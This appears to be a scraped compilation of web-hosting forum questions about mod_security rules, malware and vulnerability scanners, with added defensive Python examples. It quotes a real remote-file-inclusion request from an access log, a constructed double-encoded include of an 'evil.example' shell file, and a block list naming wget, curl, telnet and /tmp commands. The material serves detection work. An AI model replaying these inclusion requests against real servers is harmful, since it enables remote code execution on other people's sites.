How To Block Acunetix Scanner With Mod_security
Aug 12, 2007
Anybody know appropriate rules to block the Acunetix scanner from crawling my sites?
How to block the following "WEB-PHP remote include path" attack using mod_security?
I have tried using the default mod_security and also mod_security from [url],
but it seems that mod_security is not functioning well, in that the PHP inject script is still able to run on my server.
The following is the WEB-PHP remote include path that I mentioned, taken from the Apache access log.
=================================
127.0.0.1 - - [15/Jun/2008:15:09:02 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:30 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473 ....
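The two log lines above are the classic shape of a remote file inclusion (RFI) attempt: a query parameter whose value is itself a URL, ending in an encoded "??" so that whatever the vulnerable script appends (".php", "/index.php") lands in the remote URL's query string and the attacker's file is fetched verbatim. Below is an added example, not code from the post or from mod_security, that pulls such requests out of an Apache access log: it parses the common log format, percent-decodes each query value until it stops changing (so double encoding does not hide the scheme), and reports values that start with a fetchable scheme. The first sample line is the one pasted in the post; the other two are constructed.

```python
"""Flag remote-file-inclusion (RFI) attempts in Apache access-log lines.

Added example, not code from the original post. The first sample line is the
one pasted in the post; the other two are constructed (a clean request and a
double-URL-encoded attempt) so the decoder has something to exercise.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache common log format: host ident user [time] "method target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Schemes PHP include()/require() will fetch when allow_url_include is on,
# plus the data: wrapper, which injects code without any network fetch.
REMOTE_SCHEME_RE = re.compile(r'^(?:https?|ftps?)://|^data:', re.IGNORECASE)

SAMPLE_LINES = [
    # from the post: the trailing %3f%3f ("??") neutralises whatever the script appends
    '127.0.0.1 - - [15/Jun/2008:15:09:02 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473',
    # constructed: benign request
    '10.0.0.5 - - [15/Jun/2008:15:20:00 +0800] "GET /index.php?page=about HTTP/1.1" 200 1234',
    # constructed: double-encoded "http://evil.example/shell.txt?"
    '10.0.0.9 - - [15/Jun/2008:15:21:10 +0800] "GET /index.php?page=%2568ttp%253a%252f%252fevil.example%252fshell.txt%253f HTTP/1.1" 200 900',
]


def decode_fully(value, max_rounds=4):
    """Percent-decode until the string stops changing (defeats double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not common log format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_rfi(line):
    """Return a list of hits {ip, status, param, url} for one access-log line."""
    rec = parse_line(line)
    if rec is None:
        return []
    query = urlsplit(rec["target"]).query
    hits = []
    for param, raw in parse_qsl(query, keep_blank_values=True):
        value = decode_fully(raw)
        if REMOTE_SCHEME_RE.match(value):
            hits.append({"ip": rec["ip"], "status": rec["status"], "param": param, "url": value})
    return hits


def scan_access_log(lines):
    hits = []
    for line in lines:
        hits.extend(find_rfi(line))
    return hits


if __name__ == "__main__":
    for h in scan_access_log(SAMPLE_LINES):
        # A 200 here does not prove the include ran: compare the response size with
        # the normal page and look for outbound connections from the web server
        # to the URL's host before treating the box as compromised.
        print(f'{h["ip"]} status={h["status"]} param={h["param"]} url={h["url"]}')
```

A match in the log only tells you the request arrived; whether the include executed depends on allow_url_include/allow_url_fopen in php.ini and on the application passing the parameter to include(). Blocking at mod_security is a second line; the first is turning allow_url_include off.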
I installed the new version of CSF, and it warned me about the option to check for cxs. I had a few questions:
1 - Is it free? Can it be installed, and will it work?
2 - Are these things additional to the installation?
3 - Could someone explain a bit about this new option and how to resolve it to get out of the red?
Does anyone know of any open source tools that will scan CGI programs for exploits? Specifically for exploitable formmail scripts.
What type of free email scanner gateway are you using? I am using SA, Clam and Qmail. It's a little old and without a GUI for clients to manage the settings.
I'm thinking of switching to something with a GUI. Perhaps the combination of Exim, SA, Clam, MailScanner and a GUI.
While reading a lot of posts and blogs about hosting, I wanted to ask if someone has an idea of how to find files with illegal content.
I just tried a few bash scripts, but if there are a few thousand files, most of them stop working or produce server load that stops the whole server.
Is there any software already out there, or any script, to scan the content on the server for phrases?
I want to secure my server so that scanner tools cannot scan my site, because one of my sites is very important and I do not want its folders scanned.
My server OS: Linux CentOS 5.
I would like to know how resource intensive the ClamAV scanner is. Should I allow it for my VPS clients/resellers or not?
Can I set it to run as root? How?
I wonder which virus scanner software is useful for a Unix server (CentOS 4.5). One of my clients installed an SMF forum, and when visitors access the forum their virus scanner warns that the site is infected with a trojan. I used ClamAV to scan the entire home directory, but it seems nothing was found.
I have a managed server. I just want to be sure that it is secured.
I want a company to test my server with a security scanner
and give me a report about my bugs.
Are there any vulnerability scanners that search the local file system for vulnerable apps?
I don't need an external scanner. I want to scan all my users' home dirs for bad apps: old Coppermines, phpBB, etc.
I've not been able to find anything like this.
Anyone use this poorly coded thing?
Goolag Scanner, coded by CULT OF THE DEAD COW/cDc communications.
I've been using it for a bit, but I don't have any vulns on most of my boxes.
Anyone else find this thing effective?
I've passed it on to a few clients; it seems to entertain them doing their own basic Google-powered security scans.
Here is a quick download: Goolag_Scanner_1.0.0.40_Setup.exe
I've pulled a few results on other large sites, some interesting data that's spread out on Google; strange how the crawlers get into it?
1.2 Software
        To understand Goolag Scanner, it is important to understand how "dorks"
        work (see 1.4) and with that, to establish the use of dorks as an
        acceptable tool for information security experts, penetration testers,
        and practical paranoids.
1.4 Terms And Abbreviations
* Dork = A detailed search pattern - heretofore used with Google's
search engine - that uses Google to show untapped results for web
sites previously indexed by Google.
The intention of a dork is to find results that might show
information relevant to security issues and/or confidential data.
From our point of view, dorks are not limited to Google. Frankly,
they are malicious patterns that apply to most search engines.
* gS = Goolag Scanner
* cDc = CULT OF THE DEAD COW/cDc communications
I installed the latest version of MailScanner on my Linux server. It has been tested to be scanning and running properly. But one thing that is unusual is that the emails being processed by MailScanner do not get tagged as having been processed by it, so I do not really know whether they have been processed.
When I check the full email headers, I am missing information like spam score, spam information and spam status. I checked mailscanner.conf and the configuration was done correctly.
How can we set this information to show in the email headers that it has been processed?
I have been using mod_security 1.9.x since its first release on Apache 1.3 and Apache 2.0.x. The rules are great and they work perfectly with no issues at all with any PHP-MySQL website. Do you recommend using mod_security 2.0 or 2.5? (I do know that 2.5 does not work with Apache 1.3.)
...using mod_security, but I believe that I have it installed correctly, with some rules that should be generating entries in the security audit log. No matter what I do, I can't seem to get mod_security to generate any sort of log entries.
I am using version 2.1.7.  I compiled it with no problems.  In my httpd.conf file, I have the following relevant lines:
LoadFile /usr/lib/libxml2.so
LoadModule security2_module modules/mod_security2.so
Include conf/modsecurity/*.conf
I don't think there are any problems here, as I know it is running directives from the configuration file I edited.  This is the file I'm working with:
modsecurity_crs_10_config.conf
Here are the relevant lines from the config file:
SecRuleEngine On
SecRequestBodyAccess On
SecResponseBodyAccess On
SecResponseBodyMimeType (null) text/html text/plain text/xml
SecResponseBodyLimit 524288
SecDefaultAction "phase:2,auditlog,log,pass,status:500"
SecAuditEngine On
SecAuditLogType Serial
SecAuditLog logs/modsec_audit.log
SecAuditLogParts "ABIFHZ"
SecRequestBodyInMemoryLimit 131072
SecDebugLog             logs/modsec_debug.log
SecDebugLogLevel        3
I know that the config file is being read because when I start apache, the log files (modsec_audit.log and modsec_debug.log) are created.  The problem is that the files are empty and remain empty no matter what I do.  I have even tried setting permissions on the files to 777.
Here are a couple of rules I created in an attempt to generate log entries:
SecRule REQUEST_BODY "viagra"
SecRule REMOTE_ADDR "^1.1.3.4$" auditlog,phase:1,allow
I put these in the same config file mentioned above.  As far as I understand, the first rule should examine the request body (which would include data in POST requests) for the word, "viagra".  Since my default action is phase:2,auditlog,log,pass,status:500, such requests should end up in the audit log.  However, when I use a form on my site to post the word "viagra", nothing is generated in the log file.
The second rule, as far as I understand, should generate a log entry any time the IP address 1.2.3.4 is sent in the request headers.  Instead of 1.2.3.4, of course, I have put in my real IP address.  However, when I visit my server and browse pages, nothing is logged.  I assume that my requests should generate log entries since I match the IP address.
I am currently running a few small websites that use a CMS. Two are Dragonfly and one is Joomla.
I am getting sporadic errors with both systems that, upon research, seem to be related to Apache and the mod_security module. I am getting the following error:
Code:
Not Acceptable
An appropriate representation of the requested resource /somefolder/index.php could not be found on this server.
Well, I'm no idiot (although some people may tend to disagree) and after some searching, I found that this most likely points to an Apache error. Most solutions suggest putting the following in my .htaccess file for the site:
Code:
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
It was noted that "SecFilterScanPOST Off" may or may not be necessary. I have added the above to the .htaccess for each site (all 3 sites are subdomains) and have also added it to the .htaccess that is in the root folder for the site. Nothing has worked.
So my question is, is it possible that my webhost can override my .htaccess settings with their own? This is the only explanation that I can think of. But of course, I am no expert, which is why I turn to you good folks for help once again.
I want to add some more rules to mod_security, however I am unsure if some of them are already being used.
So would it cause any problems if there are duplicate rules for the time being, until I can check through all the rules?
I am having lots of problems installing mod_security on RH5 64 w/ Plesk,
mainly related to apr0, subversion, and the headers.
Any reason why everyone recommends using version 1.94 of mod_security rather than the latest version available on www.modsecurity.org?
I've got this:
mod_security: Access denied with code 406. Error normalising REQUEST_URI: Invalid URL encoding detected: invalid characters used [hostname "www.mydomain.com"] [uri "/search/include/js_suggest/suggest.php?type=query&q=%u062E%u0636%u0631%u0627"]
How do I disable/exclude this URI on the mentioned host from being caught by mod_security?
how many people are actually using mod_security 2 instead of 1?
And why did you choose the version you did?
I installed ModSecurity from the addon modules in cPanel.
When I try to run a PHP shell it works fine without any errors and I can do anything, despite the presence of ModSecurity protection and disable_functions in php.ini.
Are there particular settings to add to httpd.conf to prevent running a PHP shell, or to prevent uploading it to the site?
I tried using mod_security and mod_filter together. However, when I try to filter JS files, I noticed that certain pages stop working, especially those using AJAX.
I installed mod_security on my CentOS server today and am having some problems configuring it.
Problem -
I have added this module in the 'httpd.conf' file:
Code:
<IfModule mod_security.c>
SecFilterEngine On
SecServerSignature "Apache"
SecFilterCheckUnicodeEncoding Off
SecAuditEngine RelevantOnly
SecAuditLog logs/audit_log
SecFilterScanPOST On
SecFilterDefaultAction "deny,log,status:403"
SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"
SecFilterSelective HTTP_Transfer-Encoding "!^$"
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"
SecFilter "../"
SecFilter "viewtopic.php?" chain
SecFilter "chr(([0-9]{1,3}))" "deny,log"
SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "lynx "
SecFilterSelective THE_REQUEST "scp "
SecFilterSelective THE_REQUEST "ftp "
SecFilterSelective THE_REQUEST "cvs "
SecFilterSelective THE_REQUEST "rcp "
SecFilterSelective THE_REQUEST "curl "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "ssh "
SecFilterSelective THE_REQUEST "echo "
SecFilterSelective THE_REQUEST "links -dump "
SecFilterSelective THE_REQUEST "links -dump-charset "
SecFilterSelective THE_REQUEST "links -dump-width "
SecFilterSelective THE_REQUEST "links http:// "
SecFilterSelective THE_REQUEST "links ftp:// "
SecFilterSelective THE_REQUEST "links -source "
SecFilterSelective THE_REQUEST "mkdir "
SecFilterSelective THE_REQUEST "cd /tmp "
SecFilterSelective THE_REQUEST "cd /var/tmp "
SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "
SecFilterSelective THE_REQUEST "/config.php?v=1&DIR "
SecFilterSelective THE_REQUEST "/../../ "
SecFilterSelective THE_REQUEST "&highlight=%2527%252E "
SecFilterSelective THE_REQUEST "changedir=%2Ftmp%2F.php "
# Very crude filters to prevent SQL injection attacks
SecFilter "delete[[:space:]]+from"
SecFilter "insert[[:space:]]+into"
SecFilter "select.+from"
# Weaker XSS protection but allows common HTML tags
SecFilter "<[[:space:]]*script"
# Prevent XSS atacks (HTML/Javascript injection)
SecFilter "<(.|\n)+>"
</IfModule>
But my website is a multi-forum host and requires the 'index.php' file to be passed parameters to make it work.
Example -
[url]
[url]
[url]
So I had to delete the code mentioned below from the above module:
Code:
SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"
SecFilterSelective HTTP_Transfer-Encoding "!^$"
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"
SecFilter "../"
Is it possible to disable a particular mod_security rule for a particular directory, or are the rules global?
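The config posted above is mod_security 1.x syntax (SecFilter, SecFilterSelective, SecFilterDefaultAction), which mod_security 2.x does not accept; a later post in this thread asks how to make such rules work on Apache 2 with mod_security 2. The following is an added example, not code from any post here or from the ModSecurity project: a small translator that rewrites the 1.x directives used above into 2.x SecRule form. It renames the variables that changed (THE_REQUEST becomes REQUEST_LINE, HTTP_X becomes REQUEST_HEADERS:X, ARG_x becomes ARGS:x, COOKIE_x becomes REQUEST_COOKIES:x), expands a bare SecFilter to the URI, arguments and body it used to search, merges the actions of a chain onto its first rule (2.x only allows disruptive actions there), adds the phase a 2.x default action needs, and numbers rules from an assumed base id of 900001. The sample input is a subset of the config above.

```python
"""Translate ModSecurity 1.x SecFilter directives into 2.x SecRule syntax.

Added example; not code from the posts or from the ModSecurity project.
Rule ids start at an assumed base of 900001; pick a free range for your set.
"""
import re

TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')
ID_BASE = 900001  # assumption: 2.x (2.7+) requires a unique id per rule

# 1.x variables renamed in 2.x; everything else keeps its name
VAR_MAP = {"THE_REQUEST": "REQUEST_LINE", "POST_PAYLOAD": "REQUEST_BODY",
           "SCRIPT_FILENAME": "REQUEST_FILENAME"}
# 1.x prefixed variables become 2.x collections with a selector
PREFIX_MAP = {"HTTP_": "REQUEST_HEADERS:", "ARG_": "ARGS:", "COOKIE_": "REQUEST_COOKIES:"}
SECFILTER_TARGETS = "REQUEST_URI|ARGS|REQUEST_BODY"  # what a bare SecFilter searched
DIRECTIVE_MAP = {"SecFilterEngine": "SecRuleEngine", "SecFilterScanPOST": "SecRequestBodyAccess"}
# encoding checks became operators (@validateUtf8Encoding, @validateUrlEncoding, @validateByteRange)
DROPPED = {"SecFilterCheckUnicodeEncoding", "SecFilterCheckURLEncoding", "SecFilterForceByteRange"}

SAMPLE_1X = """\
<IfModule mod_security.c>
SecFilterEngine On
SecFilterCheckUnicodeEncoding Off
SecFilterScanPOST On
SecFilterDefaultAction "deny,log,status:403"
SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilter "../"
SecFilter "viewtopic.php?" chain
SecFilter "chr(([0-9]{1,3}))" "deny,log"
</IfModule>
"""


def tokenize(line):
    """Split on whitespace, keeping double-quoted strings (minus the quotes) whole."""
    return [quoted or bare for quoted, bare in TOKEN_RE.findall(line)]


def map_variable(spec):
    out = []
    for v in spec.split("|"):
        for prefix, coll in PREFIX_MAP.items():
            if v.startswith(prefix):
                v = coll + v[len(prefix):]
                break
        else:
            v = VAR_MAP.get(v, v)
        out.append(v)
    return "|".join(out)


def split_actions(tokens):
    return [a.strip() for t in tokens for a in t.split(",") if a.strip()]


class Translator:
    def __init__(self):
        self.next_id, self.pending, self.out = ID_BASE, [], []

    def flush(self):
        """Emit the buffered chain: all actions go on the first rule (2.x allows
        disruptive actions only there) and 'chain' marks every rule but the last."""
        n = len(self.pending)
        merged = [f"id:{self.next_id}"]
        for _, _, acts in self.pending:
            merged += [a for a in acts if a != "chain" and a not in merged]
        for i, (variables, pattern, _) in enumerate(self.pending):
            acts = merged if i == 0 else []
            if i < n - 1:
                acts.insert(1 if i == 0 else 0, "chain")
            line = f'SecRule {variables} "{pattern}"'
            self.out.append(line + (f' "{",".join(acts)}"' if acts else ""))
        if n:
            self.next_id += 1
        self.pending = []

    def feed(self, line):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            self.out.append(line)
            return
        tokens = tokenize(stripped)
        name = tokens[0]
        if name == "SecFilter" and len(tokens) >= 2:
            self.pending.append((SECFILTER_TARGETS, tokens[1], split_actions(tokens[2:])))
        elif name == "SecFilterSelective" and len(tokens) >= 3:
            self.pending.append((map_variable(tokens[1]), tokens[2], split_actions(tokens[3:])))
        else:
            self.flush()
            self.out.append(self.directive(name, tokens[1:], stripped))
            return
        if "chain" not in self.pending[-1][2]:
            self.flush()

    def directive(self, name, args, raw):
        if raw.lower().startswith("<ifmodule mod_security.c>"):
            return "<IfModule mod_security2.c>"
        if name in DROPPED:
            return "# dropped, 1.x only (use the matching 2.x @validate* operator): " + raw
        if name == "SecFilterDefaultAction":
            acts = split_actions(args)
            if not any(a.startswith("phase:") for a in acts):
                acts.insert(0, "phase:2")  # 2.x default actions must carry a phase
            return f'SecDefaultAction "{",".join(acts)}"'
        if name in DIRECTIVE_MAP:
            return f"{DIRECTIVE_MAP[name]} {' '.join(args)}"
        return raw  # SecAuditEngine, SecAuditLog, SecServerSignature, </IfModule> are unchanged


def translate(text):
    t = Translator()
    for line in text.splitlines():
        t.feed(line)
    t.flush()
    return "\n".join(t.out)


if __name__ == "__main__":
    print(translate(SAMPLE_1X))
```

The patterns are copied verbatim, which is safe as far as syntax goes (both versions use PCRE), but the translation does not make a rule any smarter: the posted "<(.|\n)+>" filter will still deny every request carrying an angle bracket in the URI, arguments or body, which is the usual reason forum posts and CMS editors break, and per-directory exceptions in 2.x are done with SecRuleRemoveById inside a Location or htaccess block rather than by editing the global set.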
I just installed mod_security via WHM, and want to know what rule I should enter to prevent some URLs from being opened.
For example, if a URL contains the word "abc" (like domain.com/some_folder/abc/file.php), it should not be opened.
I have installed a new server with Debian Lenny 5, ISPConfig 3.0.1.1 and the newest mod_security, and implemented the default rules.
I deactivated the rule detecting IPs in page headers.
Then I got another problem. Some actions of ISPConfig are detected as "remote file access attempt", severity "critical", tag "web attack/file injection", data "/etc/",
detected by rule file crs_40 line 114, id 950005.
Question: how do I authorize ISPConfig, and only ISPConfig, to perform such requests on the server?
How do I set the rules of mod_security?
Another question for professionals:
Q: What are the best rules to secure my server? I'd appreciate it if you could attach these rules to your replies. // FYI, I host vBulletin portals.
Trying to use an RBL with ModSecurity, but this matches everything, whether listed or not.
SecRule REMOTE_ADDR "@rbl bb.barracudacentral.org" "log,deny,msg:'POST RBL Comment Spammer'"
What I would like to do is an RBL lookup on any POST operations.
How do I make these rules work on Apache 2 with mod_security 2?
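Before tuning the rule, it is worth checking what the DNSBL zone itself answers, because an @rbl rule is only as good as the zone's replies. By the DNSBL convention (RFC 5782) a zone must list the test address 127.0.0.2 and must not list 127.0.0.1; a zone that answers positively for 127.0.0.1 is answering every query positively, which is exactly the "matches everything" symptom (some public lists, Barracuda's among them, require the querying resolver to be registered). The code below is an added example, not from the post or from ModSecurity: it builds the reversed-octet query name and runs the two test points. The resolver is injectable so the logic can be exercised offline; the real lookup uses the system resolver.

```python
"""Sanity-check a DNSBL zone before trusting a ModSecurity @rbl rule.

Added example, not code from the original post. RFC 5782: a working DNSBL
lists 127.0.0.2 and does NOT list 127.0.0.1. If 127.0.0.1 comes back listed,
every lookup is "positive" and an @rbl rule fires on every client.
"""
import ipaddress
import socket


def rbl_query_name(ip, zone):
    """Reversed-octet DNSBL query name, e.g. 4.3.2.1.<zone> for 1.2.3.4."""
    addr = ipaddress.ip_address(ip)
    if addr.version != 4:
        raise ValueError("this helper handles IPv4 zones only")
    return ".".join(reversed(str(addr).split("."))) + "." + zone


def dns_a_lookup(name):
    """Return the A record for name, or None on NXDOMAIN/failure (= not listed)."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def rbl_listed(ip, zone, resolver=dns_a_lookup):
    """Return the DNSBL return code (usually 127.0.0.x) if ip is listed, else None."""
    return resolver(rbl_query_name(ip, zone))


def zone_sanity(zone, resolver=dns_a_lookup):
    """Run the RFC 5782 test points; 'usable' is False if the zone lists 127.0.0.1."""
    positive = rbl_listed("127.0.0.2", zone, resolver)
    negative = rbl_listed("127.0.0.1", zone, resolver)
    return {
        "lists_test_point": positive is not None,
        "lists_clean_point": negative is not None,
        "usable": positive is not None and negative is None,
    }


if __name__ == "__main__":
    zone = "bb.barracudacentral.org"  # the zone named in the post
    print(zone, zone_sanity(zone))     # live query through the system resolver
```

If the zone passes, the remaining problem is the rule shape: as posted it has no phase and nothing restricting it to POSTs. In ModSecurity 2 that is a two-rule chain, with the first rule matching REQUEST_METHOD against ^POST$ and carrying the actions (phase:2, id, chain, deny, log, msg) and the second rule carrying only REMOTE_ADDR with the @rbl operator; the chain fires only when both match.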
Any good secure rules for mod_security 2 that work well for shared servers?
Can someone share what rules you are using to secure your shared servers? I have tried a few different sets of rules, but a few customers always end up with errors, and disabling it for their domain name doesn't sound like a safer option for them or the server.
Share your mod_sec 2 rules.